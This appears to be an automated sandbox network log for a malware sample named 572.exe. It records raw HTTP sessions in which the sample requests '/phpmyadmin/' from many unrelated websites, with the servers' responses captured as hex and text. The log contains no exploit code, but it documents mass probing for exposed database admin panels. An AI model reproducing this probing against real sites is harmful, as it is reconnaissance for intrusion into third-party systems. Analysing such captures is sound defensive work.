                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC1369INData Raw: 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 3c 74 69 74 6c 65 3e 46 41 43 45 49 54 20 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: in.js"></script></head><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no" /><meta name="theme-color" content="#000000" /><link rel="shortcut icon" href="/favicon.ico" /><title>FACEIT Connect</
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC464INData Raw: 3d 3d 20 27 6c 6f 61 64 69 6e 67 27 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 3d 20 70 72 65 76 3b 68 61 6e 64 6c 65 72 28 29 3b 7d 7d 3b 7d 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: == 'loading') {document.onreadystatechange = prev;handler();}};}})();</script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                11192.168.2.6525638.45.52.148443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: genshin.mihoyo.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC522INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: /en
                                                                                                                                                                                                                                                                                                                                                                Ali-Swift-Global-Savetime: 1707131690
                                                                                                                                                                                                                                                                                                                                                                Via: cache17.l2us2[315,315,302-0,M], cache40.l2us2[315,0], ens-cache6.us19[328,327,302-0,M], ens-cache13.us19[329,0]
                                                                                                                                                                                                                                                                                                                                                                X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                                                                                                                                                                                                                                                X-Swift-SaveTime: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                X-Swift-CacheTime: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                EagleId: 082d34a117071316902976969e


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                12192.168.2.652516184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC233INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                13192.168.2.652554192.185.5.23443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=538a39c5bfd5b3f5ecb61012152f863d; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC7906INData Raw: 31 65 62 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1eb3<!DOCTYPE html><html lang="en-US" class="no-js no-svg"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="//gmpg.org/xfn/11"><script>(function(html){html.className = html.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC8151INData Raw: 20 2e 70 61 6e 65 6c 2d 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 3c 2f 61 72 74 69 63 6c 65 3e 3c 21 2d 2d 20 23 70 6f 73 74 2d 34 20 2d 2d 3e 0a 0a 09 09 0a 09 3c 2f 6d 61 69 6e 3e 3c 21 2d 2d 20 23 6d 61 69 6e 20 2d 2d 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 23 70 72 69 6d 61 72 79 20 2d 2d 3e 0a 0a 0a 09 09 3c 2f 64 69 76 3e 3c 21 2d 2d 20 23 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 3c 66 6f 6f 74 65 72 20 69 64 3d 22 63 6f 6c 6f 70 68 6f 6e 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 09 09 09 09 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 69 6e 66 6f 22 3e 0a 09 09 3c 61 20 68 72 65 66 3d 22 2f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .panel-content --></article>... #post-4 --></main>... #main --></div>... #primary --></div>... #content --><footer id="colophon" class="site-footer" role="contentinfo"><div class="wrap"><div class="site-info"><a href="/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC8192INData Raw: 32 30 30 30 0d 0a 30 2e 30 37 31 20 30 2e 30 38 39 71 2d 30 2e 33 32 31 20 30 2e 33 33 39 2d 30 2e 39 34 36 20 30 2e 33 39 33 68 2d 32 2e 30 35 34 71 2d 31 2e 32 36 38 20 30 2e 30 37 31 2d 32 2e 36 30 37 2d 30 2e 32 39 35 74 2d 32 2e 33 34 38 2d 30 2e 39 34 36 2d 31 2e 38 33 39 2d 31 2e 31 37 39 2d 31 2e 32 35 39 2d 31 2e 30 32 37 6c 2d 30 2e 34 34 36 2d 30 2e 34 32 39 71 2d 30 2e 31 37 39 2d 30 2e 31 37 39 2d 30 2e 34 39 31 2d 30 2e 35 33 36 74 2d 31 2e 32 37 37 2d 31 2e 36 32 35 2d 31 2e 38 39 33 2d 32 2e 36 39 36 2d 32 2e 31 38 38 2d 33 2e 37 36 38 2d 32 2e 33 33 2d 34 2e 38 35 37 71 2d 30 2e 31 30 37 2d 30 2e 32 38 36 2d 30 2e 31 30 37 2d 30 2e 34 38 32 74 30 2e 30 35 34 2d 30 2e 32 38 36 6c 30 2e 30 37 31 2d 30 2e 31 30 37 71 30 2e 32 36 38 2d 30 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 20000.071 0.089q-0.321 0.339-0.946 0.393h-2.054q-1.268 0.071-2.607-0.295t-2.348-0.946-1.839-1.179-1.259-1.027l-0.446-0.429q-0.179-0.179-0.491-0.536t-1.277-1.625-1.893-2.696-2.188-3.768-2.33-4.857q-0.107-0.286-0.107-0.482t0.054-0.286l0.071-0.107q0.268-0.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC6INData Raw: 30 2e 31 34 33 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0.143h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC8192INData Raw: 32 30 30 30 0d 0a 2d 35 2e 38 37 35 76 2d 39 2e 34 36 34 71 30 2d 31 2e 38 37 35 2d 30 2e 37 32 33 2d 32 2e 39 33 38 74 2d 32 2e 32 35 39 2d 31 2e 30 36 33 71 2d 31 2e 31 32 35 20 30 2d 31 2e 38 38 34 20 30 2e 36 31 36 74 2d 31 2e 31 33 34 20 31 2e 35 32 37 71 2d 30 2e 31 39 36 20 30 2e 35 33 36 2d 30 2e 31 39 36 20 31 2e 34 34 36 76 39 2e 38 37 35 68 2d 35 2e 38 37 35 71 30 2e 30 33 36 2d 37 2e 31 32 35 20 30 2e 30 33 36 2d 31 31 2e 35 35 34 74 2d 30 2e 30 31 38 2d 35 2e 32 38 36 6c 2d 30 2e 30 31 38 2d 30 2e 38 35 37 68 35 2e 38 37 35 76 32 2e 35 37 31 68 2d 30 2e 30 33 36 71 30 2e 33 35 37 2d 30 2e 35 37 31 20 30 2e 37 33 32 2d 31 74 31 2e 30 30 39 2d 30 2e 39 32 39 20 31 2e 35 35 34 2d 30 2e 37 37 37 20 32 2e 30 34 35 2d 30 2e 32 37 37 71 33 2e 30 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000-5.875v-9.464q0-1.875-0.723-2.938t-2.259-1.063q-1.125 0-1.884 0.616t-1.134 1.527q-0.196 0.536-0.196 1.446v9.875h-5.875q0.036-7.125 0.036-11.554t-0.018-5.286l-0.018-0.857h5.875v2.571h-0.036q0.357-0.571 0.732-1t1.009-0.929 1.554-0.777 2.045-0.277q3.05
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC6INData Raw: 33 32 2d 32 2e 39
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 32-2.9
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC8192INData Raw: 31 66 66 38 0d 0a 32 39 2d 31 2e 33 35 37 20 30 2d 32 2e 37 36 38 20 30 2e 33 33 39 20 32 2e 33 33 39 20 33 2e 30 33 36 20 34 2e 33 39 33 20 36 2e 38 32 31 20 31 2e 32 33 32 2d 30 2e 34 36 34 20 32 2e 33 32 31 2d 31 2e 30 38 30 74 31 2e 37 32 33 2d 31 2e 30 39 38 20 31 2e 31 37 2d 31 2e 30 31 38 20 30 2e 36 37 2d 30 2e 37 32 33 7a 4d 32 35 2e 34 32 39 20 31 35 2e 38 37 35 71 2d 30 2e 30 35 34 2d 34 2e 31 34 33 2d 32 2e 36 36 31 2d 37 2e 33 32 31 6c 2d 30 2e 30 31 38 20 30 2e 30 31 38 71 2d 30 2e 31 36 31 20 30 2e 32 31 34 2d 30 2e 33 33 39 20 30 2e 34 33 38 74 2d 30 2e 37 37 37 20 30 2e 37 39 35 2d 31 2e 32 36 38 20 31 2e 30 38 30 2d 31 2e 37 38 36 20 31 2e 31 36 31 2d 32 2e 33 34 38 20 31 2e 31 35 32 71 30 2e 34 34 36 20 30 2e 39 34 36 20 30 2e 37 38 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ff829-1.357 0-2.768 0.339 2.339 3.036 4.393 6.821 1.232-0.464 2.321-1.080t1.723-1.098 1.17-1.018 0.67-0.723zM25.429 15.875q-0.054-4.143-2.661-7.321l-0.018 0.018q-0.161 0.214-0.339 0.438t-0.777 0.795-1.268 1.080-1.786 1.161-2.348 1.152q0.446 0.946 0.786


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                14192.168.2.65257231.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: es-la.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC389INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/phpmyadmin/?locale=es_LA&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: Bd08GB2tG8sZrIizAB6Q8Qrb0pWqn3Ctx+QIKK0UbsSIyYo8zT0FFuXgDlSabbpcYgVN5EI19Hflo25ryN9VBg==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                15192.168.2.652585195.85.23.95443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC589INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                x-bc: ded6949
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-web22
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.bongacams.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6928251d6c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                16192.168.2.6545933.161.150.89443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC2006INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tg
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=b3db4f1536220013&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgf1YHftP-MD0Nj5eWPMs1KD5HVRMSfgXxlrKZIDoU2Tg; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-6ejAOTd8UT2ZFAN' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 85d554a60ac318933f765b1c3e116f30.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: QU5cviGa22iKRK-3SQwiISGFojqt13VxSKiT7FrUy1AD_vLjTgkjVQ==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC14378INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC7574INData Raw: 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6c 6b 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6c 72 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 33 31 22 2c 22 6e 61 6d 65 22 3a 22 4c 69 62 65 72 69 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 4c 65 73 6f 74 68 6f 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 36 36 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6c 73 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 33 37 30 22 2c 22 6e 61 6d 65 22 3a 22 4c 69 74 68 75 61 6e 69 61 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6c 74 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 6c 75 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 33 35 32 22 2c 22 6e 61 6d 65 22 3a 22 4c 75 78 65 6d 62 6f 75 72 67 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: untry_code":"lk"},{"country_code":"lr","prefix":"+231","name":"Liberia"},{"name":"Lesotho","prefix":"+266","country_code":"ls"},{"prefix":"+370","name":"Lithuania","country_code":"lt"},{"country_code":"lu","prefix":"+352","name":"Luxembourg"},{"country_co
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                17192.168.2.65255687.233.198.20443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
